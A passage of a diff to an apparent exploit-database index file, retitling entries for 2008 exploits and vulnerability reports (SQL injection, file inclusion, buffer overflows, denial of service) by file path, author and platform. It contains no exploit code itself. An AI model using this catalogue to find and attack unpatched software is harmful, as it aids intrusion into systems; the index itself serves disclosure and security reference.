Remote Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0 +4988,platforms/asp/webapps/4988.txt,"candypress ecommerce suite 4.1.1.26 Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0 +4989,platforms/php/webapps/4989.txt,"simple forum 3.2 (fd/xss) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0 4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 Numerous Remote SQL Injection Vulnerabilities",2008-01-26,"Charles Hooper",php,webapps,0 4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 Multiple Local File Inclusion Vulnerabilities",2008-01-26,Stack,php,webapps,0 4992,platforms/php/webapps/4992.txt,"Wordpress Plugin WP-Cal 0.3 editevent.php SQL Injection Vulnerability",2008-01-27,Houssamix,php,webapps,0 @@ -4671,7 +4671,7 @@ id,file,description,date,author,platform,type,port 5032,platforms/windows/local/5032.c,"Total Video Player 1.03 M3U File Local Buffer Overflow Exploit",2008-02-01,"fl0 fl0w",windows,local,0 5033,platforms/php/webapps/5033.txt,"LightBlog 9.5 cp_upload_image.php Remote File Upload Vulnerability",2008-02-01,Omni,php,webapps,0 5034,platforms/php/webapps/5034.txt,"Joomla Component NeoReferences 1.3.1 (catid) SQL Injection Vuln",2008-02-01,"S@BUN ",php,webapps,0 -5035,platforms/php/webapps/5035.txt,"Wordpress Plugin dmsguestbook 1.7.0 Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps,0 +5035,platforms/php/webapps/5035.txt,"wordpress plugin dmsguestbook 1.7.0 Multiple Vulnerabilities",2008-02-02,NBBN,php,webapps,0 5036,platforms/windows/dos/5036.pl,"Titan FTP Server 6.03 (USER/PASS) Remote Heap Overflow PoC",2008-02-02,securfrog,windows,dos,0 5037,platforms/php/webapps/5037.txt,"The Everything Development System <= Pre-1.0 SQL Injection Vuln",2008-02-02,sub,php,webapps,0 5039,platforms/php/webapps/5039.txt,"Wordpress Plugin Wordspew Remote SQL Injection Vulnerability",2008-02-02,"S@BUN ",php,webapps,0 @@ -4747,7 +4747,7 @@ id,file,description,date,author,platform,type,port 5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability",2008-02-13,"S@BUN ",php,webapps,0 5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffiĂ© ",windows,dos,0 5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module SEH Overwrite Exploit",2008-02-13,Elazar,windows,remote,0 -5112,platforms/jsp/webapps/5112.txt,"JSPWiki 2.4.104 / 2.5.139 Multiple Remote Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0 +5112,platforms/jsp/webapps/5112.txt,"jspwiki 2.4.104 / 2.5.139 Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0 5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 (Firmware <= 1.0.4.800) Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0 5114,platforms/php/webapps/5114.pl,"Affiliate Market 0.1 BETA - XSS / SQL Injection Exploit",2008-02-14,IRCRASH,php,webapps,0 5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 (threads.php ssid) SQL Injection Vulnerability",2008-02-14,IRCRASH,php,webapps,0 @@ -4786,7 +4786,7 @@ id,file,description,date,author,platform,type,port 5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics (articleid) Remote SQL Injection Vulnerability",2008-02-18,"S@BUN ",php,webapps,0 5149,platforms/php/webapps/5149.txt,"sCssBoard (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0 5150,platforms/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel RFI Vulnerability",2008-02-18,Crackers_Child,hardware,remote,0 -5151,platforms/osx/dos/5151.pl,"Apple iPhoto 4.0.3 DPAP Server Denial of Service Exploit",2008-02-18,"David Wharton",osx,dos,0 +5151,platforms/osx/dos/5151.pl,"Apple iPhoto 4.0.3 DPAP Server Denial of Service Exploit",2008-02-18,"David Wharton",osx,dos,0 5152,platforms/multiple/dos/5152.sh,"X.Org xorg-server <= 1.1.1-48.13 Probe for Files Exploit PoC",2008-02-19,vl4dZ,multiple,dos,0 5153,platforms/windows/remote/5153.asp,"Ourgame GLWorld 2.x hgs_startNotify() ActiveX Buffer Overflow Exploit",2008-02-19,luoluo,windows,remote,0 5154,platforms/php/webapps/5154.txt,"PHP-Nuke Module Sections (artid) Remote SQL Injection Vulnerability",2008-02-19,"S@BUN ",php,webapps,0 @@ -4800,13 +4800,13 @@ id,file,description,date,author,platform,type,port 5162,platforms/php/webapps/5162.txt,"Globsy 1.0 (file) Remote File Disclosure Vulnerability",2008-02-20,GoLd_M,php,webapps,0 5163,platforms/php/webapps/5163.txt,"PHP-Nuke Module Inhalt (cid) SQL Injection Vulnerability",2008-02-20,Crackers_Child,php,webapps,0 5164,platforms/php/webapps/5164.php,"Woltlab Burning Board 3.0.x Remote Blind SQL Injection Exploit",2008-02-20,NBBN,php,webapps,0 -5165,platforms/php/webapps/5165.php,"PunBB <= 1.2.16 Blind Password Recovery Exploit",2008-02-21,EpiBite,php,webapps,0 +5165,platforms/php/webapps/5165.php,"PunBB <= 1.2.16 - Blind Password Recovery Exploit",2008-02-21,EpiBite,php,webapps,0 5166,platforms/php/webapps/5166.htm,"MultiCart 2.0 (productdetails.php) Remote SQL Injection Exploit",2008-02-20,t0pP8uZz,php,webapps,0 5167,platforms/linux/local/5167.sh,"X.Org xorg-x11-xfs <= 1.0.2-3.1 Local Race Condition Exploit",2008-02-21,vl4dZ,linux,local,0 5168,platforms/php/webapps/5168.txt,"PHP-Nuke Modules Manuales 0.1 (cid) SQL Injection Vulnerability",2008-02-21,"Mehmet Ince",php,webapps,0 5169,platforms/php/webapps/5169.txt,"PHP-Nuke Module Siir (id) Remote SQL Injection Vulnerability",2008-02-21,"S@BUN ",php,webapps,0 5170,platforms/php/webapps/5170.txt,"BeContent v.031 (id) Remote SQL Injection Vulnerability",2008-02-21,Cr@zy_King,php,webapps,0 -5171,platforms/php/webapps/5171.txt,"OSSIM 0.9.9rc5 (XSS/SQL Injection) Multiple Remote Vulnerabilities",2008-02-21,"Marcin Kopec",php,webapps,0 +5171,platforms/php/webapps/5171.txt,"ossim 0.9.9rc5 (xss/sql injection) Multiple Vulnerabilities",2008-02-21,"Marcin Kopec",php,webapps,0 5172,platforms/php/webapps/5172.txt,"PHP-Nuke Module NukeC 2.1 (id_catg) SQL Injection Vulnerability",2008-02-21,DamaR,php,webapps,0 5173,platforms/php/webapps/5173.txt,"phpQLAdmin 2.2.7 Multiple Remote File Inclusion Vulnerabilities",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 5174,platforms/php/webapps/5174.txt,"Quantum Game Library 0.7.2c Remote File Inclusion Vulnerabilities",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 @@ -4816,7 +4816,7 @@ id,file,description,date,author,platform,type,port 5178,platforms/php/webapps/5178.txt,"Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability",2008-02-23,"S@BUN ",php,webapps,0 5179,platforms/php/webapps/5179.txt,"phpUserBase 1.3b (unverified.inc.php) Local File Inclusion Vulnerability",2008-02-23,BeyazKurt,php,webapps,0 5180,platforms/php/webapps/5180.txt,"phpUserBase 1.3b (unverified.inc.php) Remote File Inclusion Vulnerability",2008-02-24,CraCkEr,php,webapps,0 -5181,platforms/php/webapps/5181.txt,"Pigyard Art Gallery Multiple Remote Vulnerabilities",2008-02-24,ZoRLu,php,webapps,0 +5181,platforms/php/webapps/5181.txt,"pigyard art gallery Multiple Vulnerabilities",2008-02-24,ZoRLu,php,webapps,0 5182,platforms/php/webapps/5182.txt,"Portail Web Php <= 2.5.1.1 Multiple Inclusion Vulnerabilities",2008-02-24,GoLd_M,php,webapps,0 5183,platforms/php/webapps/5183.txt,"php Download Manager <= 1.1 Local File Inclusion Vulnerability",2008-02-24,BeyazKurt,php,webapps,0 5184,platforms/windows/dos/5184.py,"MyServer 0.8.11 (204 No Content) error Remote Denial of Service Exploit",2008-02-25,shinnai,windows,dos,0 @@ -4837,7 +4837,7 @@ id,file,description,date,author,platform,type,port 5199,platforms/php/webapps/5199.txt,"SiteBuilderElite 1.2 Multiple Remote File Inclusion Vulnerabilities",2008-02-28,MhZ91,php,webapps,0 5200,platforms/php/webapps/5200.txt,"Podcast Generator <= 1.0 BETA 2 RFI / File Disclosure Vulnerabilities",2008-02-28,GoLd_M,php,webapps,0 5201,platforms/windows/dos/5201.txt,"Crysis <= 1.1.1.5879 Remote Format String Denial of Service PoC",2008-02-28,"Long Poke",windows,dos,0 -5202,platforms/php/webapps/5202.txt,"Barryvan Compo Manager 0.5pre-1 Remote File Inclusion Vulnerability",2008-02-28,MhZ91,php,webapps,0 +5202,platforms/php/webapps/5202.txt,"barryvan compo manager 0.5pre-1 - Remote File Inclusion Vulnerability",2008-02-28,MhZ91,php,webapps,0 5203,platforms/php/webapps/5203.txt,"PHP-Nuke My_eGallery <= 2.7.9 Remote SQL Injection Vulnerability",2008-02-28,"Aria-Security Team",php,webapps,0 5204,platforms/php/webapps/5204.py,"Centreon <= 1.4.2.3 (get_image.php) Remote File Disclosure Exploit",2008-02-28,"Julien CAYSSOL",php,webapps,0 5205,platforms/windows/remote/5205.html,"Symantec BackupExec Calendar Control (PVCalendar.ocx) BoF Exploit",2008-02-29,Elazar,windows,remote,0 @@ -4863,9 +4863,9 @@ id,file,description,date,author,platform,type,port 5225,platforms/windows/dos/5225.html,"KingSoft UpdateOcx2.dll SetUninstallName() Heap Overflow PoC",2008-03-10,void,windows,dos,0 5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 (cat) SQL Injection Vulnerability",2008-03-10,Don,php,webapps,0 5227,platforms/solaris/local/5227.c,"Solaris 8/9/10 fifofs I_PEEK Local Kernel memory Leak Exploit",2008-03-10,"Marco Ivaldi",solaris,local,0 -5228,platforms/windows/remote/5228.txt,"Acronis PXE Server 2.0.0.1076 Directory Traversal / NULL Pointer Vulns",2008-03-10,"Luigi Auriemma",windows,remote,0 -5229,platforms/multiple/dos/5229.txt,"ASG-Sentry <= 7.0.0 Multiple Remote Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 -5230,platforms/windows/remote/5230.txt,"Argon Client Management Services <= 1.31 Directory Traversal Vuln",2008-03-10,"Luigi Auriemma",windows,remote,0 +5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / null pointer vulns",2008-03-10,"Luigi Auriemma",windows,remote,0 +5229,platforms/multiple/dos/5229.txt,"asg-sentry <= 7.0.0 Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 +5230,platforms/windows/remote/5230.txt,"argon client management services <= 1.31 - Directory Traversal vuln",2008-03-10,"Luigi Auriemma",windows,remote,0 5231,platforms/php/webapps/5231.php,"phpMyNewsletter <= 0.8b5 (archives.php msg_id) SQL Injection Exploit",2008-03-10,"Charles Fol",php,webapps,0 5232,platforms/php/webapps/5232.txt,"Mapbender <= 2.4.4 (mapFiler.php) Remote Code Execution Vulnerability",2008-03-11,"RedTeam Pentesting",php,webapps,0 5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 (gaz) Remote SQL Injection Vulnerability",2008-03-11,"RedTeam Pentesting",php,webapps,0 @@ -4881,8 +4881,8 @@ id,file,description,date,author,platform,type,port 5243,platforms/php/webapps/5243.txt,"Fully Modded phpBB (kb.php) Remote SQL Injection Vulnerability",2008-03-12,TurkishWarriorr,php,webapps,0 5244,platforms/php/webapps/5244.txt,"eXV2 Module bamaGalerie 3.03 - Remote SQL Injection Vulnerability",2008-03-12,"S@BUN ",php,webapps,0 5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability",2008-03-12,"S@BUN ",php,webapps,0 -5246,platforms/php/webapps/5246.txt,"EasyCalendar <= 4.0tr Multiple Remote Vulnerabilities",2008-03-12,JosS,php,webapps,0 -5247,platforms/php/webapps/5247.txt,"EasyGallery <= 5.0tr Multiple Remote Vulnerabilities",2008-03-12,JosS,php,webapps,0 +5246,platforms/php/webapps/5246.txt,"easycalendar <= 4.0tr Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 +5247,platforms/php/webapps/5247.txt,"easygallery <= 5.0tr Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 (FETCH) Remote Buffer Overflow Exploit",2008-03-13,ryujin,windows,remote,143 5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent <= 3.13 (Fetch) post-auth Remote BOF Exploit",2008-03-14,haluznik,windows,remote,0 5250,platforms/windows/local/5250.cpp,"VLC <= 0.8.6e Subtitle Parsing Local Buffer Overflow Exploit",2008-03-14,"Mai Xuan Cuong",windows,local,0 @@ -4896,14 +4896,14 @@ id,file,description,date,author,platform,type,port 5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 IMAP post-auth Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143 5260,platforms/php/webapps/5260.txt,"fuzzylime cms <= 3.01 (admindir) Remote File Inclusion Vulnerability",2008-03-14,irk4z,php,webapps,0 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow PoC",2008-03-15,"Wiktor Sierocinski",windows,dos,0 -5262,platforms/php/webapps/5262.txt,"Mutiple Timesheets <= 5.0 Multiple Remote Vulnerabilities",2008-03-16,JosS,php,webapps,0 +5262,platforms/php/webapps/5262.txt,"mutiple timesheets <= 5.0 Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0 5263,platforms/php/webapps/5263.txt,"phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability",2008-03-16,irk4z,php,webapps,0 5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 ActiveX Remote BOF Exploit",2008-03-16,h07,windows,remote,0 5265,platforms/php/webapps/5265.txt,"Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities",2008-03-17,GoLd_M,php,webapps,0 5266,platforms/php/webapps/5266.txt,"PHPauction GPL Enhanced 2.51 Multiple RFI Vulnerabilities",2008-03-17,RoMaNcYxHaCkEr,php,webapps,0 5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability",2008-03-17,"S@BUN ",php,webapps,0 5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) Remote Denial of Service Exploit (iphone/osx/win)",2008-03-17,"Georgi Guninski",multiple,dos,0 -5269,platforms/windows/remote/5269.txt,"MG-SOFT Net Inspector 6.5.0.828 Multiple Remote Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 +5269,platforms/windows/remote/5269.txt,"mg-soft net inspector 6.5.0.828 Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 5270,platforms/windows/dos/5270.pl,"Home FTP Server 1.4.5 Remote Denial of Service Exploit",2008-03-17,0in,windows,dos,0 5273,platforms/php/webapps/5273.txt,"Joomla Component Acajoom (com_acajoom) SQL Injection Vulnerability",2008-03-18,fataku,php,webapps,0 5274,platforms/asp/webapps/5274.txt,"KAPhotoservice (album.asp) Remote SQL Injection Exploit",2008-03-18,JosS,asp,webapps,0 @@ -4923,9 +4923,9 @@ id,file,description,date,author,platform,type,port 5289,platforms/hardware/remote/5289.txt,"ZyXEL ZyWALL Quagga/Zebra (default pass) Remote Root Vulnerability",2008-03-21,"Pranav Joshi",hardware,remote,0 5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability",2008-03-21,"S@BUN ",php,webapps,0 5291,platforms/php/webapps/5291.txt,"D.E. Classifieds (cat_id) Remote SQL Injection Vulnerability",2008-03-21,"S@BUN ",php,webapps,0 -5292,platforms/php/webapps/5292.py,"PostNuke <= 0.764 Blind SQL Injection Exploit",2008-03-21,The:Paradox,php,webapps,0 +5292,platforms/php/webapps/5292.py,"PostNuke <= 0.764 - Blind SQL Injection Exploit",2008-03-21,The:Paradox,php,webapps,0 5293,platforms/php/webapps/5293.pl,"XLPortal <= 2.2.4 (search) Remote SQL Injection Exploit",2008-03-21,cOndemned,php,webapps,0 -5294,platforms/php/webapps/5294.txt,"Joomla Components custompages 1.1 Remote File Inclusion Vulnerability",2008-03-22,Sniper456,php,webapps,0 +5294,platforms/php/webapps/5294.txt,"joomla components custompages 1.1 - Remote File Inclusion Vulnerability",2008-03-22,Sniper456,php,webapps,0 5295,platforms/php/webapps/5295.pl,"PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection Exploit",2008-03-22,Inphex,php,webapps,0 5296,platforms/php/webapps/5296.txt,"Cuteflow Bin 1.5.0 (login.php) Local File Inclusion Vulnerability",2008-03-22,KnocKout,php,webapps,0 5297,platforms/php/webapps/5297.txt,"Joomla Component rekry 1.0.0 (op_id) SQL Injection Vulnerability",2008-03-23,Sniper456,php,webapps,0 @@ -5006,8 +5006,8 @@ id,file,description,date,author,platform,type,port 5372,platforms/php/webapps/5372.txt,"Easynet Forum Host (forum.php forum) SQL Injection Vulnerability",2008-04-05,t0pP8uZz,php,webapps,0 5373,platforms/asp/webapps/5373.txt,"CoBaLT 0.1 Multiple Remote SQL Injection Vulnerabilities",2008-04-05,U238,asp,webapps,0 5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability",2008-04-05,t0pP8uZz,php,webapps,0 -5375,platforms/php/webapps/5375.txt,"VisualPic 0.3.1 Remote File Inclusion Vulnerability",2008-04-05,Cr@zy_King,php,webapps,0 -5376,platforms/php/webapps/5376.pl,"Picture Rating 1.0 Blind SQL Injection Exploit",2008-04-05,t0pP8uZz,php,webapps,0 +5375,platforms/php/webapps/5375.txt,"visualpic 0.3.1 - Remote File Inclusion Vulnerability",2008-04-05,Cr@zy_King,php,webapps,0 +5376,platforms/php/webapps/5376.pl,"Picture Rating 1.0 - Blind SQL Injection Exploit",2008-04-05,t0pP8uZz,php,webapps,0 5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 (cat_id) Remote SQL Injection Vulnerability",2008-04-05,t0pP8uZz,php,webapps,0 5378,platforms/php/webapps/5378.txt,"Software Index 1.1 (cid) Remote SQL Injection Vulnerability",2008-04-05,t0pP8uZz,php,webapps,0 5379,platforms/php/webapps/5379.txt,"MyBB Plugin Custom Pages 1.0 Remote SQL Injection Vulnerability",2008-04-06,Lidloses_Auge,php,webapps,0 @@ -5027,7 +5027,7 @@ id,file,description,date,author,platform,type,port 5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 (root) Remote File Inclusion Vulnerability",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 (viewsource.php) Remote File Disclosure Vulnerability",2008-04-07,GoLd_M,php,webapps,0 5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 -5396,platforms/windows/dos/5396.txt,"HP OpenView NNM 7.53 Multiple Remote Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 +5396,platforms/windows/dos/5396.txt,"hp openview nnm 7.53 Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download (NeffyLauncher.dll) Code Execution Vuln",2008-04-07,"Simon Ryeo",windows,remote,0 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer ActiveX BOF Exploit",2008-04-07,"Patrick Webster",windows,remote,0 5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 (viewsource.php file) File Disclosure Vulnerability",2008-04-07,Stack,php,webapps,0 @@ -5035,7 +5035,7 @@ id,file,description,date,author,platform,type,port 5401,platforms/php/webapps/5401.txt,"My Gaming Ladder <= 7.5 (ladderid) SQL Injection Vulnerability",2008-04-07,t0pP8uZz,php,webapps,0 5402,platforms/php/webapps/5402.txt,"iScripts SocialWare (id) Remote SQL Injection Vulnerbility",2008-04-07,t0pP8uZz,php,webapps,0 5404,platforms/php/webapps/5404.php,"phpTournois <= G4 Remote File Upload/Code Execution Exploit",2008-04-08,"Charles Fol",php,webapps,0 -5405,platforms/php/webapps/5405.txt,"ExBB <= 0.22 (LFI/RFI) Multiple Remote Vulnerabilities",2008-04-08,The:Paradox,php,webapps,0 +5405,platforms/php/webapps/5405.txt,"exbb <= 0.22 (lfi/rfi) Multiple Vulnerabilities",2008-04-08,The:Paradox,php,webapps,0 5406,platforms/php/webapps/5406.txt,"Pligg CMS 9.9.0 (editlink.php id) Remote SQL Injection Vulnerability",2008-04-08,"Guido Landi",php,webapps,0 5407,platforms/php/webapps/5407.php,"FLABER <= 1.1 RC1 Remote Command Execution Exploit",2008-04-08,EgiX,php,webapps,0 5408,platforms/php/webapps/5408.pl,"LokiCMS <= 0.3.3 Remote Command Execution Exploit",2008-04-08,girex,php,webapps,0 @@ -5050,7 +5050,7 @@ id,file,description,date,author,platform,type,port 5417,platforms/php/webapps/5417.htm,"phpBB Add-on Fishing Cat Portal Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0 5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 Arbitrary Add Admin Exploit",2008-04-09,t0pP8uZz,php,webapps,0 5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script (path) File Disclosure Vulnerability",2008-04-09,JiKo,php,webapps,0 -5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) Remote File Disclosure Vulnerability",2008-04-09,HaCkeR_EgY,php,webapps,0 +5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure Vulnerability",2008-04-09,HaCkeR_EgY,php,webapps,0 5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 SQL Injection Vulnerabilities",2008-04-09,"Virangar Security",php,webapps,0 5422,platforms/php/webapps/5422.pl,"LiveCart <= 1.1.1 (category id) Blind SQL Injection Exploit",2008-04-10,irvian,php,webapps,0 5423,platforms/php/webapps/5423.txt,"Ksemail (index.php language) Local File Inclusion Vulnerability",2008-04-10,dun,php,webapps,0 @@ -5059,7 +5059,7 @@ id,file,description,date,author,platform,type,port 5426,platforms/php/webapps/5426.txt,"RX Maxsoft (popup_img.php fotoID) Remote SQL Injection Vulnerability",2008-04-10,"S@BUN ",php,webapps,0 5427,platforms/windows/dos/5427.pl,"Borland InterBase 2007 - ibserver.exe Buffer Overflow PoC",2008-04-11,"Liu Zhen Hua",windows,dos,0 5428,platforms/php/webapps/5428.txt,"PHPKB 1.5 Knowledge Base (ID) SQL Injection Vulnerability",2008-04-11,parad0x,php,webapps,0 -5429,platforms/php/webapps/5429.txt,"NewsOffice 1.1 Remote File Inclusion Vulnerability",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 +5429,platforms/php/webapps/5429.txt,"newsoffice 1.1 - Remote File Inclusion Vulnerability",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 5430,platforms/multiple/remote/5430.txt,"HP OpenView Network Node Manager <= 7.53 Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote,0 5431,platforms/php/webapps/5431.txt,"Joomla Component joomlaXplorer <= 1.6.2 Remote Vulnerabilities",2008-04-11,Houssamix,php,webapps,0 5432,platforms/php/webapps/5432.txt,"phpAddressBook 2.11 (view.php id) SQL Injection Vulnerability",2008-04-11,Cr@zy_King,php,webapps,0 @@ -5067,7 +5067,7 @@ id,file,description,date,author,platform,type,port 5434,platforms/php/webapps/5434.pl,"1024 CMS <= 1.4.2 Local File Inclusion / Blind SQL Injection Exploit",2008-04-13,girex,php,webapps,0 5435,platforms/php/webapps/5435.txt,"Joomla Component com_extplorer <= 2.0.0 RC2 Local Directory Traversal",2008-04-13,Houssamix,php,webapps,0 5436,platforms/php/webapps/5436.txt,"Pollbooth <= 2.0 (pollID) Remote SQL Injection Vulnerability",2008-04-13,"S@BUN ",php,webapps,0 -5437,platforms/php/webapps/5437.txt,"cpCommerce 1.1.0 (XSS/LFI) Multiple Remote Vulnerabilities",2008-04-13,BugReport.IR,php,webapps,0 +5437,platforms/php/webapps/5437.txt,"cpcommerce 1.1.0 (xss/lfi) Multiple Vulnerabilities",2008-04-13,BugReport.IR,php,webapps,0 5438,platforms/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 (XCWD) Denial of Service Exploit",2008-04-13,j0rgan,windows,dos,0 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 Remote Insecure Cookie Handling Vulnerability",2008-04-13,t0pP8uZz,php,webapps,0 5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 Remote Blind SQL Injection Exploit",2008-04-13,Lidloses_Auge,php,webapps,0 @@ -5082,14 +5082,14 @@ id,file,description,date,author,platform,type,port 5449,platforms/php/webapps/5449.php,"KwsPHP (Upload) Remote Code Execution Exploit",2008-04-14,Ajax,php,webapps,0 5450,platforms/php/webapps/5450.txt,"Classifieds Caffe (index.php cat_id) SQL Injection Vulnerability",2008-04-15,JosS,php,webapps,0 5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)",2008-04-15,ryujin,windows,remote,6080 -5452,platforms/php/webapps/5452.txt,"LightNEasy SQLite / no database <= 1.2.2 Multiple Remote Vulnerabilities",2008-04-15,girex,php,webapps,0 +5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database <= 1.2.2 Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0 5453,platforms/windows/dos/5453.pl,"DivX Player <= 6.7.0 SRT File Buffer Overflow PoC",2008-04-15,securfrog,windows,dos,0 5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 (new) Remote SQL Injection Vulnerability",2008-04-15,cO2,php,webapps,0 5455,platforms/windows/dos/5455.py,"BS.Player 2.27 Build 959 SRT File Buffer Overflow PoC",2008-04-16,j0rgan,windows,dos,0 -5456,platforms/asp/webapps/5456.txt,"Carbon Communities <= 2.4 Multiple Remote Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0 +5456,platforms/asp/webapps/5456.txt,"carbon communities <= 2.4 Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0 5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials <= 2.1 (id) SQL Injection Vulnerability",2008-04-16,cO2,php,webapps,0 5458,platforms/linux/dos/5458.txt,"xine-lib <= 1.1.12 NSF demuxer Stack Overflow Vulnerability PoC",2008-04-16,"Guido Landi",linux,dos,0 -5459,platforms/php/webapps/5459.txt,"e107 Module 123 Flash Chat 6.8.0 Remote File Inclusion Vulnerability",2008-04-17,by_casper41,php,webapps,0 +5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion Vulnerability",2008-04-17,by_casper41,php,webapps,0 5460,platforms/windows/dos/5460.html,"Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC",2008-04-17,"Shennan Wang",windows,dos,0 5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG Wireless Driver Remote BOF Exploit (meta)",2008-04-17,oveRet,windows,remote,0 5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 SRT File SEH Buffer Overflow Exploit",2008-04-18,muts,windows,local,0 @@ -5108,42 +5108,42 @@ id,file,description,date,author,platform,type,port 5475,platforms/asp/webapps/5475.txt,"W1L3D4 Philboard 1.0 (philboard_reply.asp) SQL Injection Vulnerability",2008-04-20,U238,asp,webapps,0 5476,platforms/php/webapps/5476.txt,"HostDirectory Pro Insecure Cookie Handling Vulnerability",2008-04-20,Crackers_Child,php,webapps,0 5477,platforms/php/webapps/5477.txt,"Kubelance 1.6.4 (ipn.php i) Local File Inclusion Vulnerability",2008-04-20,Crackers_Child,php,webapps,0 -5478,platforms/php/webapps/5478.txt,"Acidcat CMS 3.4.1 Multiple Remote Vulnerabilities",2008-04-20,BugReport.IR,php,webapps,0 +5478,platforms/php/webapps/5478.txt,"acidcat cms 3.4.1 Multiple Vulnerabilities",2008-04-20,BugReport.IR,php,webapps,0 5479,platforms/windows/local/5479.txt,"Adobe Album Starter 3.2 Unchecked Local Buffer Overflow Exploit",2008-04-21,c0ntex,windows,local,0 5480,platforms/php/webapps/5480.txt,"BlogWorx 1.0 (view.asp id) Remote SQL Injection Vulnerability",2008-04-21,U238,php,webapps,0 5481,platforms/php/webapps/5481.txt,"Crazy Goomba 1.2.1 (id) Remote SQL Injection Vulnerability",2008-04-21,ZoRLu,php,webapps,0 5482,platforms/asp/webapps/5482.py,"RedDot CMS 7.5 (LngId) Remote SQL Injection Exploit",2008-04-21,"IRM Plc.",asp,webapps,0 5483,platforms/php/webapps/5483.txt,"TR News 2.1 (nb) Remote SQL Injection Vulnerability",2008-04-21,His0k4,php,webapps,0 5484,platforms/php/webapps/5484.txt,"Joomla Component FlippingBook 1.0.4 SQL Injection Vulnerability",2008-04-22,cO2,php,webapps,0 -5485,platforms/php/webapps/5485.pl,"Web Calendar <= 4.1 Blind SQL Injection Exploit",2008-04-22,t0pP8uZz,php,webapps,0 +5485,platforms/php/webapps/5485.pl,"Web Calendar <= 4.1 - Blind SQL Injection Exploit",2008-04-22,t0pP8uZz,php,webapps,0 5486,platforms/php/webapps/5486.txt,"Wordpress Plugin Spreadsheet <= 0.6 SQL Injection 